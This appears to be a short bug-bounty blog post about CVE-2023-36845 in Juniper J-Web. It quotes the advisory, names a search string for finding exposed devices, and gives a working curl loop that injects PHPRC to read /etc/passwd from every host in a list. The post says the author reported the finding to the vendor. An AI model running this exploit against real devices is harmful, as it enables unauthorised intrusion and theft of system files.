How I exploited CVE-2023–36845 and got root access in one domain.
Har Har Mahadev! Hey, this is Prince roy, a cyber security researcher. Recently, CVE-2023–36845 has been published which allows attackers to gain root access to the victim domain.
Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2. According to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36845
And I successfully gained root access to one product of Vodafone Netherlands. But due to their policy, can’t disclose their details. However, I going to tell you how to exploit this vulnerability.
"Juniper Web Device Manager"
Then found a lot of IP addresses and one of them was the product of Vodafone. After that, I opened the IP address and found this.
Luckily I found a post by Rohit Gautam sir, where he posted the one-line command. According to his post, I saved that IP address in the file.txt and ran that
cat file.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo "This is VULN";done
And Guess what !! the output was
I was like
Immediately I reported this issue to them within one hour they accepted my report. Finally, I want to thank my mentor Aditya Shende sir for his support. Thank you, guys for reading this small blog of mine.
Please follow my Social media accounts for further updates: